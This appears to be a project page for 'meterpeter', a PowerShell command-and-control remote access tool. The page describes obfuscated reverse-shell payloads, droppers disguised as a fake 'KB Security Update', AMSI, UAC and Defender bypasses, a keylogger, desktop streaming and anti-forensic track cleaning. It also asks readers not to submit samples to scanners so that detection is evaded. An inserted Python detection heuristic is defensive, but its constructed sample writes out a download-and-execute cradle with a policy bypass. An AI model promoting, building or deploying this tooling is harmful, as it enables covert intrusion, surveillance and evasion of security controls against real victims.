meterpeter C2 - v2.10.11 - Sagittarius A*
Quick Jump Links
- Project Home Page (GitHub)
- Install Under Linux Distros
- Install Under Windows Distros
- Project GitHub Wiki Pages (Modules)
- Working with meterpeter dropper(s)
- Special Thanks (Contributions)
Project Description - Sagittarius_A* - Remote Access Tool v2.10.11
This PS1 script starts a listener server on a Windows or Linux attacker machine and generates PowerShell reverse TCP shell payloads, obfuscated with 'BXOR' under a random secret key
plus another layer of character/variable obfuscation, to be executed on the target machine. You can also receive the generated reverse TCP shell connection via 'netcat'
(in that case you lose C2 functionalities such as screenshot, upload/download files, Keylogger, AdvInfo, PostExploit, Escalation-Of-Privileges and Stream Target Desktop).
Executing the client (payload) with admin privileges unlocks ALL C2 server modules (AMSI + Execution_Policy bypasses). Droppers mimic a fake 'KB Security Update';
if executed, they download and execute client.ps1 in the background in the '$Env:TMP' trusted location, with the intent of evading Windows Defender + Exploit Guard.
Remark: Meterpeter payloads and droppers are FUD (please don't test or send samples to VirusTotal, similar websites, or to Microsoft's cloud suspicious.amsi sample submission).
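From the detection side, as an added example that is not part of the meterpeter project, the following Python heuristic scores PowerShell text for the traits the description above lists: -bxor decoding fed to IEX, a download cradle staging client.ps1 under $Env:TMP, execution-policy changes and a fake 'KB Security Update' lure. The rule weights, the threshold and the three sample scripts are constructed assumptions for this example, not real tool output.

```python
import re

# Heuristic rules for the traits the project description above names:
# BXOR-decoded text fed to IEX, a download cradle staging client.ps1 in
# $Env:TMP, execution-policy changes, and a fake "KB Security Update" lure.
# Each rule is (name, regex, weight); the weights are an assumption.
RULES = [
    ("bxor_decode", re.compile(r"-bxor\b", re.I), 3),
    ("iex_dynamic_string", re.compile(r"\b(iex|invoke-expression)\b", re.I), 2),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), 2),
    ("tmp_staging", re.compile(r"\$env:(tmp|temp)\b", re.I), 1),
    ("exec_policy_change", re.compile(r"executionpolicy\s+(bypass|unrestricted)", re.I), 2),
    ("fake_kb_update_lure", re.compile(r"\bkb\d{6,7}.{0,40}security update", re.I), 3),
    ("reverse_tcp_client", re.compile(r"net\.sockets\.tcpclient", re.I), 2),
]

def score_script(text):
    """Return (score, matched rule names) for one PowerShell script body."""
    hits = [name for name, rx, _ in RULES if rx.search(text)]
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits

def verdict(text, threshold=5):
    """Classify a script as 'suspicious' once the weighted score reaches threshold."""
    score, hits = score_script(text)
    return ("suspicious" if score >= threshold else "benign"), score, hits

# Constructed samples (not real meterpeter output); the URL is a placeholder.
BENIGN = r"Get-ChildItem $Env:TMP | Where-Object { $_.Length -gt 1MB } | Sort-Object Length"
DROPPER_LIKE = "\n".join([
    r"Write-Host 'Installing KB4012345 Security Update, please wait...'",
    r'(New-Object Net.WebClient).DownloadFile("https://example.invalid/client.ps1", "$Env:TMP\client.ps1")',
    r'powershell -ExecutionPolicy Bypass -File "$Env:TMP\client.ps1"',
])
BXOR_LIKE = r"$k = 0x2a; $d = $enc | ForEach-Object { [char]([int]$_ -bxor $k) }; IEX (-join $d)"

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("dropper-like", DROPPER_LIKE), ("bxor-like", BXOR_LIKE)]:
        print(label, verdict(body))
```

A lone tmp_staging hit is expected from legitimate scripts, which is why it carries the lowest weight; the rules are a triage aid for analysts, not a signature.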
List Of Updated Modules
Module Name | Issue | Update |
---|---|---|
Info | Get more information about target system (UserAccounts,RegisteredUser,BootUpTime,etc) | Automated Internal Function Update |
Meterpeter C2 Attack Vector | TinyUrl API implementation ( obfuscate the url dropper link ) | Automated Internal Function Update |
Meterpeter C2 sub-menus | Sub-menus displays redesigned ( more clean console outputs ) | Sub-Menus displays redesigned |
Advinfo -> PingSweep | Enumerate \ Scan active IP addresses on the local LAN \ Simple Port Scanner | New Module |
Advinfo -> GetBrowsers | AMSI string flagging detection on cmdlet auto-download \ execution | AMSI string detection bypass |
AdvInfo -> FRManager | Silencing Microsoft Defender using firewall rules (SilenceDefender_ATP.ps1) | New Module |
AdvInfo -> GeoLocate | Client (payload-target) geo location and public ip address resolver | New Module |
PostExploit -> Sherlock | Added to PostExploit -> FindEop ( search for escalation of privileges entries ) | New Module |
PostExploit -> GetAdmin | Replaced old (CMSTP) AMSI DLL bypass technique by (@Oddvar_Moe) SendKeys | AMSI string detection bypass |
PostExploit -> Escalate | Post -> Escalate -> CmdLine ( Spawn UAC gui to run cmdline elevated ) | New Module |
PostExploit -> CleanTracks | LNK artifacts search updated to include even more locations | LNK artifacts search updated |
PostExploit -> hiddendir | Query \ Create \ Delete super hidden system folders | New Module |
Dropper Id 2 ( HTA ) | AMSI string flagging detection on hta Build \ Download | AMSI string detection bypass |
Dropper Id 3 ( EXE ) | Auto-set-PS-execution-policy-to-unrestricted \ Binary.exe suspicious.amsi bypass | Source Code Updated |
Meterpeter v2.10.11 release - Research - for reverse engineering
- Working with meterpeter payload droppers - exec time \ msgboxes
- Enumerate active IP Address in Lan - PingSweep.ps1 simple port scanner
- UAC Bypass POC using SendKeys! (@Oddvar_Moe) - UACBypassCMSTP.ps1 auxiliary module
- Hunting for Escalation Of Privileges possible entries - @Meterpeter post-exploit findeop.ps1 auxiliary module
- Hunting for Escalation Of Privileges possible entries - @Meterpeter post-exploit ACLMitreT1574.ps1 auxiliary module
meterpeter C2 - v2.10.11 - screenshots
Stream Target Desktop Live
Elevate session from UserLand to Administrator
Enumerating remote host installed browsers\versions
Simple ICMP\TCP builtin port scanner
Searching for Escalation Of Privileges possible entries ( Sherlock.ps1 + findEop.bat + ACLMitreT1574.ps1 )
Enumerating remote host running tasks
Cleaning attacker system tracks ( anti-forensic )